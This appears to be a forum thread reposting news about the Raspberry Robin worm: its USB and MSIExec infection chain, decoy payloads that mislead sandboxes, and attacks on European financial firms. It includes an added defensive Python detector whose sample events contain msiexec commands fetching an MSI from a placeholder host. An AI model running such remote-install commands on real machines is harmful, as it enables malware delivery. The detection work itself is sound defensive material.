Raspberry Robin worm drops fake malware to confuse researchers

silversurfer

The Raspberry Robin malware is now trying its hand at some trickery by dropping a fake payload to confuse researchers and evade detection when it detects it's being run within sandboxes and debugging tools.

This new tactic was discovered by Trend Micro researchers who observed Raspberry Robin in recent attacks against telecommunication service providers and government systems.

Raspberry Robin is a worm-like malware dropper that sells initial access to compromised networks to ransomware gangs and malware operators. It has been previously associated with FIN11 and the Clop gang, as well as Bumblebee, IcedID, and TrueBot payload distribution.

The malware reaches targeted systems via malicious USB drives that infect the device with malware when inserted and the included .LNK file is double-clicked.

When the shortcut is executed, it abuses the legitimate 'MSIExec.exe' Windows executable to download a malicious MSI installer that installs the Raspberry Robin payloads.


Figure: Typical Raspberry Robin infection chain (Trend Micro)

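A defender-side check for the MSIExec step described in the post, added here as an example (it is not code from the article, from Trend Micro, or from this forum): it flags process-creation events in which msiexec.exe is handed a remote URL, and records the quiet-install switch and an explorer.exe parent as supporting signals. The Sysmon-style field names and the sample events are assumed and constructed for the example.

```python
import ntpath
import re

# Constructed process-creation events shaped like Sysmon Event ID 1 fields.
# They are made up for this example, not real telemetry from the campaign.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /q /i http://example.invalid:8080/pkg/update.msi"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /i C:\Users\user\Downloads\vendor-tool.msi"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe http://example.invalid/readme.txt"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\MSIEXEC.EXE",
     "CommandLine": r"MSIEXEC.EXE /qn /package https://example.invalid/a.msi"},
]

URL_RE = re.compile(r"\bhttps?://[^\s\"']+", re.IGNORECASE)
QUIET_RE = re.compile(r"(?:^|\s)/(?:q|qn|qb|quiet)\b", re.IGNORECASE)


def remote_msiexec_reasons(event):
    """Return the reasons an event looks like msiexec.exe fetching an MSI from
    a URL (the hand-off step in the chain above). Empty list: not flagged."""
    image = ntpath.basename(event.get("Image", "")).lower()
    if image != "msiexec.exe":
        return []
    cmd = event.get("CommandLine", "")
    url = URL_RE.search(cmd)
    if not url:
        return []  # a package installed from a local path is out of scope here
    reasons = ["remote package URL: " + url.group(0)]
    if QUIET_RE.search(cmd):
        reasons.append("quiet/unattended install switch")
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    if parent == "explorer.exe":
        reasons.append("parent explorer.exe (consistent with a double-clicked shortcut)")
    return reasons


def scan(events):
    """Return (index, reasons) for every flagged event in a batch."""
    hits = []
    for i, event in enumerate(events):
        reasons = remote_msiexec_reasons(event)
        if reasons:
            hits.append((i, reasons))
    return hits
```

Sites that legitimately push MSI packages from internal web servers need an allow-list of their own hosts before turning this into an alert.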

silversurfer

Financial and insurance sectors in Europe have been targeted by the Raspberry Robin worm, as the malware continues to evolve its post-exploitation capabilities while remaining under the radar.

"What is unique about the malware is that it is heavily obfuscated and highly complex to statically disassemble," Security Joes said in a new report published Monday.

The intrusions, observed against Spanish and Portuguese-speaking organizations, are notable for collecting more victim machine data than previously documented, with the malware now exhibiting sophisticated techniques to resist analysis.